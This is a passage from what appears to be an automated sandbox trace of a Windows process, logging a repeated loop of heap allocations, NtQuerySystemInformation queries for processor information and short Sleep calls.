lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.972] Sleep (dwMilliseconds=0x110) [0207.981] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0207.981] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.982] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.982] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0207.983] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.984] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.984] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0207.984] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0207.985] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.985] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0207.985] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0207.986] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.986] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0207.986] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0207.986] Sleep (dwMilliseconds=0x110) [0208.001] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.002] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.004] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.005] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.006] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.006] Sleep (dwMilliseconds=0x110) [0208.014] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.015] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.015] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.016] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.016] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.016] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.016] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.016] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.017] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.022] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.023] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.023] Sleep (dwMilliseconds=0x110) [0208.029] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.029] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.029] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.029] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.029] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.030] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.030] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.030] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.031] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.031] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.031] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.032] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.033] Sleep (dwMilliseconds=0x110) [0208.045] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.045] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.046] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.046] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.046] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.046] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.046] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.046] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.047] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.047] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.047] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.048] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.049] Sleep (dwMilliseconds=0x110) [0208.060] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.060] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.061] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.061] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.061] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.062] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.062] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.062] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.062] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.063] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.066] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.066] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.066] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.067] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.067] Sleep (dwMilliseconds=0x110) [0208.075] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.075] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.076] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.076] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.076] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.077] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.077] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.077] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.077] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.078] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.078] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.079] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.080] Sleep (dwMilliseconds=0x110) [0208.095] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.095] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.097] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.098] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.098] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.098] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.099] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.099] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.099] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.101] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.101] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.102] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.102] Sleep (dwMilliseconds=0x110) [0208.108] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.108] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.109] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.109] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.109] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.109] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.109] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.109] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.110] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.110] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.110] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.111] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.111] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.111] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.111] Sleep (dwMilliseconds=0x110) [0208.183] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.183] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.184] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.184] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.184] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.185] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.185] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.185] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.189] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.189] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.191] Sleep (dwMilliseconds=0x110) [0208.202] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.202] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.203] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.203] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.203] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.204] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.204] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.204] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.204] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.206] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.206] Sleep (dwMilliseconds=0x110) [0208.217] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.217] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.217] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.217] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.217] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.218] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.218] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.218] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.218] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.222] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.222] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.222] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.222] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.223] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.223] Sleep (dwMilliseconds=0x110) [0208.235] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.235] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.236] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.236] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.236] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.236] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.236] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.236] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.237] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.238] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.238] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.238] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.239] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.239] Sleep (dwMilliseconds=0x110) [0208.250] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.251] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.251] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.251] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.251] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.252] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.253] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.253] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.253] HeapFree (in: 